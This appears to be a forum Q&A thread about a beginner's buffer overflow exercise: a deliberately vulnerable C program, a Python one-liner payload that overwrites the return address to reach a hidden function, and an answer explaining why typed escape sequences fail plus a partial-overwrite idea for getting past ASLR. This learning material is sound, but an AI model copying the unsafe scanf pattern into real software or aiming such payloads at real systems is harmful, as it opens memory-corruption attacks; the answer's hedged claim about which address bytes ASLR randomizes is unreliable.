Passing buffer overflow exploit string while program is running?

Question

I'm doing a really simple example of buffer overflows, I have this code:

#include <stdio.h>

void secretFunction()
{
    printf("Congratulations!\n");
    printf("You have entered in the secret function!\n");
}

void echo()
{
    char buffer[20];

    printf("Enter some text:\n");
    scanf("%s", buffer);
    printf("You entered: %s\n", buffer);    
}

int main()
{
    echo();

    return 0;
}

To start with, I compile this file with no stack protections, and aslr turned off:

gcc buf.c -o vuln_nostack -fno-stack-protector -m32 -no-pie

For exploiting this, we simply want to inject the memory adress of the secret function so that we can get to run it. This can be done with running the file with python generating the input:

 $ python -c 'print "a"*32 + "\xd6\x91\x04\x08"' | ./vuln_nostack 
Enter some text:
You entered: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa֑
Congratulations!
You have entered in the secret function!
Segmentation fault (core dumped)

Which hits my secret function. So this works.

But now the problem is that I want to to work with aslr as well, so I want to output the adress of the secret function at the start of the program, and then have the malicious input depend on that. FOr that reason, I want to wait by inputting anything to the program, until I have seen what it has printed to me.

But if I now run the program where I just give the input manually while the program runs:

./vuln_nostack
Enter some text:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa֑\xd6\x91\x04\x08
You entered: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa֑\xd6\x91\x04\x08
Segmentation fault (core dumped)

Then it simply handles my input correctly, and the value is not overflown. A segmentation error occurs, indicating that something is happening, but not the same direction to my secret function

I'm pretty new to overflows, and don't really understand why this is happening, when the python generated input actually works.

SO my question is whether there is a way to do this simple overflow "manually" while the program runs. Or if I will need to write some script (python perhaps) that can interact with this faulty program and give it correct input as it runs?

Answer 1

You say that your input is handled correctly in the second example but this is not the case, you can see that in the second time you ran the program, you got a segmentation fault, which means that you accessed memory which can't be deferenced(Either due to wrong memory protection or due to invalid memory address).

The reason that you failed to jump to secretFunction() on your second run, is that you were assuming that scanf parses escaped unicode values as unicode, but when you enter "\xd6" it is not parsed to a unicode value but it is parsed to 4 chars '' 'x' 'd' '6'. As you run on a 32 bit machine this is the address the program tries to execute which probably leads to a segfault as this memory is most likely not valid nor executable.

Just an idea on how to overcome ASLR without connecting with gdb after running the program and looking for the address the program was loaded to - you can try overflowing only the lower 2 bytes, as if I am not mistaken only the 2 upper bytes are randomized with ASLR, hence you only need to overflow the "offset" which is constant even with ASLR.

Here is some learning material regarding stack overflows: https://insecure.org/stf/smashstack.html